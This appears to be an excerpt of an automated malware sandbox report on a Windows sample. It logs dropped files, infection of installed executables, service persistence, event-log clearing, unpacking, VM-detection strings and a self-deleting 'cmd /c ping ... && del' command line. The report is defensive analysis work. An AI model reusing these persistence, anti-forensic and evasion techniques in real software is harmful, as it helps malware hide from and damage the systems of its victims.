            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
            Source: Binary string: rundll32.pdb source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr
            Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeUnpacked PE file: 1.2.XekSuT.exe.3c0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: SySyeu.exe.3.drStatic PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeCode function: 0_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,0_2_00401B6B
            Source: initial sampleStatic PE information: section where entry point is pointing to: /|wu>
            Source: gE4NVCZDRk.exeStatic PE information: section name: /|wu>
            Source: XekSuT.exe.0.drStatic PE information: section name: .aspack
            Source: XekSuT.exe.0.drStatic PE information: section name: .adata
            Source: MyProg.exe.1.drStatic PE information: section name: PELIB
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
            Source: SciTE.exe.1.drStatic PE information: section name: u
            Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
            Source: SySyeu.exe.3.drStatic PE information: section name: .didat
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C1638 push dword ptr [003C3084h]; ret 1_2_003C170E
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C2D9B push ecx; ret 1_2_003C2DAB
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C6014 push 003C14E1h; ret 1_2_003C6425
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C600A push ebp; ret 1_2_003C600D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10004C68 push eax; ret 3_2_10004C86
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10004CA0 push eax; ret 3_2_10004CCE
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E16883 push ecx; ret 7_2_00E16896
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E1682D push ecx; ret 7_2_00E16840
            Source: XekSuT.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934324181874163
            Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.933697981349293
            Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.933797111028876

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SysWOW64\SySyeu.exeJump to behavior
            Infects executable files (exe, dll, sys, html)
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\SySyeu.exeJump to dropped file
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeFile created: C:\Users\user\AppData\Local\Temp\6011859.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeFile created: C:\Users\user\AppData\Local\Temp\XekSuT.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\SySyeu.exeJump to dropped file
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SySyeuJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle,3_2_10001A43

            Hooking and other Techniques for Hiding and Protection

            barindex
            Self deletion via cmd or bat file
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"Jump to behavior
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 799
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeCode function: 0_2_00402400 IsIconic,0_2_00402400
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_1000265E OpenEventLogA,ClearEventLogA,CloseEventLog,3_2_1000265E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10003E6B LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,3_2_10003E6B
            Source: C:\Windows\System32\wbem\WMIADAP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance DataJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found evasive API chain (may stop execution after checking mutex)
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-436
            Uses ping.exe to sleep
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9730Jump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeWindow / User API: threadDelayed 1467Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2099Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 899Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1299Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 771Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1076Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-1591
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6011859.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1053
            Source: C:\Windows\SysWOW64\svchost.exe TID: 3264Thread sleep count: 267 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 3264Thread sleep time: -267000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 3264Thread sleep count: 9730 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 3264Thread sleep time: -9730000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624Thread sleep count: 1467 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624Thread sleep time: -733500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624Thread sleep count: 108 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420Thread sleep count: 2099 > 30Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420Thread sleep count: 899 > 30Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420Thread sleep count: 1299 > 30Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420Thread sleep count: 771 > 30Jump to behavior
            Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420Thread sleep count: 1076 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 003C1754h1_2_003C1718
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_003C29E2
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_003C2B8C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_1000358C GetSystemInfo,wsprintfA,3_2_1000358C
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: Amcache.hve.1.drBinary or memory string: VMware
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
            Source: gE4NVCZDRk.exe, 00000000.00000002.1706261210.000000000067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y
            Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001581000.00000004.00000020.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891528876.00000000015CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: SySyeu.exe, 00000007.00000002.4131120293.0000000003147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.1.drBinary or memory string: vmci.sys
            Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: gE4NVCZDRk.exe, 00000000.00000002.1706261210.000000000067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.1.drBinary or memory string: VMware20,1
            Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
            Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
